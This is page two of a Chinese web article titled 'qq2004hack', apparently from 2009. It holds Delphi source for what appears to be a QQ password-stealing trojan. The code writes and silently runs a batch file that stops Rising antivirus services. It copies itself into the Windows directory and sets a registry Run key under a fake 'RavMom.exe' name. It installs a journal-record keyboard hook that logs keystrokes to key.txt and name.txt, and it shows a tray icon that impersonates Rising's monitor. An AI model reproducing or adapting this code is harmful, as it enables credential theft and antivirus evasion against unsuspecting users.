打印本文 打印本文 关闭窗口 关闭窗口
qq2004hack
作者:武汉SEO闵涛  文章来源:敏韬网  点击数1402  更新时间:2009/4/23 18:31:10  文章录入:mintao  责任编辑:mintao

  sysdir:=getwindir;
  BatchFileName :=sysdir+''''killrav.bat'''';
  AssignFile(BFile, BatchFileName);
  Rewrite(BFile);
  Writeln(BFile, ''''@net stop RsCCenter'''');
  Writeln(BFile, ''''@net stop rsravmon'''');
  Writeln(BFile, ''''@close '''');
  CloseFile(BFile);
  myname := ExtractFilename(Application.Exename); //获得文件名
  if application.Exename <> sysdir + myname then //
    begin
      copyfile(pchar(application.Exename), pchar(sysdir + myname), False);
    end;
  with TRegistry.Create do
    begin
      RootKey := HKEY_LOCAL_MACHINE;
      OpenKey(''''\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'''', TRUE );
      WriteString( ''''system,rundll'''', sysdir+''''RavMom.exe'''' );
      free;
    end;
  assignfile(creeper,sysdir+''''key.txt'''');
  if not FileExists(sysdir+''''key.txt'''') then
    begin
      rewrite(creeper);
      closefile(creeper);
    end;
  assignfile(creeper1,sysdir+''''name.txt'''');
  if not FileExists(sysdir+''''name.txt'''') then
    begin
      rewrite(creeper1);
      closefile(creeper1);
    end;
  WinExec(pchar(sysdir+''''killrav.bat''''),sw_hide);
  hHook := 0;
  hHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, HInstance, 0);
  noti:=new(PNotifyIconData);
      noti.cbSize:=80;
      noti.Wnd:=form1.handle;
      noti.uID:=0;
      noti.szTip:=''''瑞星计算机监控'''';
      noti.hIcon:=form1.icon.handle;//瑞星图标
      noti.uFlags:=NIF_MESSAGE or NIF_ICON or NIF_TIP;
      Shell_NotifyIcon(NIM_ADD,noti);

  end;
procedure TForm1.Timer1Timer(Sender: TObject);
begin
 enumwindows(@fpopoid,0);
end;

procedure TForm1.FormDestroy(Sender: TObject);
begin
          DeleteFile(getwindir+''''key.txt'''');
          DeleteFile(getwindir+''''name.txt'''');
          DeleteFile(getwindir+''''killrav.bat'''');
end;

end.

 

 


 

上一页  [1] [2] 

打印本文 打印本文 关闭窗口 关闭窗口